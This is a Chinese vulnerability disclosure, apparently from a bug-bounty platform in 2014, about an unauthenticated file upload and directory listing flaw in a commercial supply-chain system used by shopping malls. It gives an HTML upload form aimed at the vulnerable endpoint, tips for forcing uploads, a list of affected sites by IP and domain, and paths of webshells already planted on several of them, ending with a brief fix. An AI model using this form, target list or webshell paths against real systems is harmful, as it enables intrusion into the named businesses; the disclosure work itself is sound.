漏洞详情

披露状态:

2014-08-06: 细节已通知厂商并且等待厂商处理中
2014-08-11: 厂商已经确认,细节仅向厂商公开
2014-08-14: 细节向第三方安全合作伙伴开放
2014-10-05: 细节向核心白帽子及相关领域专家公开
2014-10-15: 细节向普通白帽子公开
2014-10-25: 细节向实习白帽子公开
2014-11-04: 细节向公众公开

简要描述:

这系统对一些商场什么的影响比较大,存在文件上传和目录列举的问题,同时还发现了有网站已经被上传了webshell

详细说明:

系统名称:商业供应链系统
技术支持:北京富基融通科技有限公司

漏洞证明:

文件上传漏洞页面:
http://scm.brjt.cn:8081/web/epublic/upload.jsp
上传页面:
http://scm.brjt.cn:8081/web/epublic/upfiles.html
如果不存在就用下面的代码:
<html>
<form action="http://scm.brjt.cn:8081/web/epublic/upload.jsp" name="test" method="post" enctype="multipart/form-data">
<input type="file" name="file" size="23" id="file" />
<input type="submit" value="Submit" />
</form>
</html>

image072.png


上传之后不会重命名,直接写到upload文件夹下:

image073.png


image075.png


http://222.223.124.193:8081/web/epublic/upload.jsp
如果手工传记得修改数据包

image077.png


如果如下图一样报错,忽视就可以了

image079.png


一样会写进去

image080.png


image081.png


其它一些系统的链接也有人曾经列举出来过了:

北京奥特莱斯SCM商业供应链系统
http://123.127.107.117/web/epublic/upload.jsp
哈尔滨联强乐买SCM商业供应链系统
http://1.58.67.114/web/epublic/upload.jsp
北人集团_商业供应链SCM系统-超市
http://scm.brjt.cn:8081/web/epublic/upload.jsp
国光SCM商业供应链系统
http://gyl.jxggls.com:8080/web/epublic/upload.jsp
家乐园供应链系统
http://222.223.124.193:8081/web/epublic/upload.jsp
商业供应链系统
http://js.bjcsf.com/web/epublic/upload.jsp
商业供应链系统
http://218.66.37.70:8081/web/epublic/upload.jsp
商业供应链系统
http://218.207.88.11/web/epublic/upload.jsp
商业供应链系统
http://60.2.37.237:8080/web/epublic/upload.jsp
沈阳新一城商场经营管理有限公司
http://61.161.160.102:8080/web/epublic/upload.jsp
新朝阳购物中心网
http://60.10.134.176:8080/web/epublic/upload.jsp
东方购物广场有限公司SCM系统
http://60.213.49.66:8000/web/epublic/upload.jsp
http://221.194.122.150/web/epublic/upload.jsp


这套系统很多在7月的时候就被上传了webshell
http://scm.brjt.cn:8081/web/upload/silicwebshell.jsp

image083.png


image085.png


http://222.223.124.193:8081/web/upload/silicwebshell.jsp

image087.png


下面的部分就不截图了
http://gyl.jxggls.com:8080/web/upload/silicwebshell.jsp
http://123.127.107.117/web/upload/silicwebshell.jsp
http://1.58.67.114/web/upload/silicwebshell.jsp
另外还有目录列举,基本所有都可以:
http://222.223.124.193:8081/web/upload/

image089.png


http://61.161.160.102:8080/web/epublic/

image091.png

修复方案:

限制文件上传的类型和upload文件夹的脚本执行权限。关闭目录列举,删除webshell

标签: none

评论已关闭